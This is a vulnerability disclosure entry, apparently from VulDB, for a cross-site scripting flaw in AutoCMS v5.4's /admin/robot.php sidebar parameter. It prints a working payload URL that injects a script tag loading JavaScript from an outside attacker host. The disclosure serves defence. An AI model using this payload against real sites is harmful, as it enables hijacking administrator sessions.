Submit #407460: AutoCMS v5.4 Cross Site Scriptinginfo

Title	AutoCMS v5.4 Cross Site Scripting
Description	Summary AutoCMS v5.4 was discovered to contain a XSS vulnerability via the sidebar parameter at /admin/robot.php. Affected Component: /admin/robot.php Description: The application fails to sufficiently sanitize and escape input parameters page and sidebar. An attacker can craft a malicious URL that, when accessed by an administrator, will execute arbitrary JavaScript code. Payload: http(s)://target-ip/admin/robot.php?page=1&sidebar=1%22%3E%3CsCRiPt/SrC=//attack.com/1.js%3E
Source	⚠️ https://github.com/Hebing123/cve/issues/68
User	jiashenghe (UID 39445)
Submission	09/13/2024 05:22 (2 years ago)
Moderation	09/14/2024 08:43 (1 day later)
Status	Accepted
VulDB entry	277503 [AutoCMS 5.4 /admin/robot.php sidebar cross site scripting]
Points	20

Interested in the pricing of exploits?

See the underground prices here!